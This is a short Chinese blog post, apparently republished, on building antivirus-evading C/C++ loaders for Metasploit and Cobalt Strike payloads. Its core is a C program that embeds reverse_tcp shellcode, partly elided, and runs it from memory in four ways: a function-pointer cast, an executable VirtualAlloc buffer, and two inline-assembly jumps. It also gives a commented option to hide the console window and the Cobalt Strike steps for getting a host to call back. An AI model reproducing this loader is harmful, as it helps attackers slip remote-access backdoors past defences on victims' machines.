当前位置:   article > 正文

C/C++免杀--原生态(GG)

C/C++免杀--原生态(GG)

看个热闹吧...

metasploit payload运行原理浅析(sockedi调用约定是什么)

lib/msf/core/payload/windows/reverse_tcp.rb:

metasploit-framework/lib/msf/core/payload/windows/reverse_tcp.rb at master · rapid7/metasploit-framework · GitHub

原生态:

MSF:

  1. #include <Windows.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. //#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
  5. unsigned char buf[] =
  6. "\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b"
  7. .
  8. .
  9. .
  10. .
  11. \x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
  12. "\x00\x53\xff\xd5";
  13. int main()
  14. {
  15. //四种模式,随机选一种.(都GG)
  16. ((void(WINAPI*)(void))&buf)();
  17. //char* Memory;
  18. //Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  19. //memcpy(Memory, buf, sizeof(buf));
  20. //((void(*)())Memory)();
  21. //__asm {
  22. //lea eax,buf
  23. //call eax
  24. //}
  25. //__asm{
  26. //mov eax, offset shellcode
  27. //_emit 0xFF
  28. //_emit 0xE0
  29. //}
  30. }

CS:

cs--创建监听器--生成c的payload--替换payload--编译执行--上线

什么原理?

shellcode生成

msf cs

利用C/C++编译shellcode形成exe上线

shellcode:免杀手段繁多--搞坏的可能性小--自定义更多选择

可执行文件:免杀手段单一--搞坏的可能性大



MSF 源码地址reverse_tcp.rb

源码shellcode上线逻辑

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Monodyee/article/detail/602799
推荐阅读
相关标签
  

闽ICP备14008679号